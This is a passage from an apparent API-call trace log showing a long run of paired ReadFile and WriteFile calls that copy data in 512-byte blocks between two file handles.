nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.741] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.741] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.742] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.742] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.743] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.743] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.744] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.744] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.744] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.745] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.746] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.746] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.747] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.747] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.748] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.748] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.749] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.750] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.750] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.751] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.751] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.751] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.752] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.752] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.753] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.753] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.754] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.754] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.755] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.755] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.756] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.756] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.757] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.757] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.758] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.758] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.759] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.759] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.760] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.760] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.761] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.761] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.762] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.762] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.763] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.763] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.764] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.764] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.765] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.765] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.765] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.766] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.766] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.767] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.767] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.768] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.768] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.769] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.769] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.770] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.770] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.771] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.771] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.772] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.772] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.772] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.773] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.773] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.774] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.774] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.775] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.775] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.776] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.776] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.777] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.777] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.778] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.778] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.779] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.780] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.781] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.781] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.782] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.782] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.782] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.783] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.783] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.784] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.784] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.785] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.785] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.786] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.786] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.787] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.787] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.788] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, 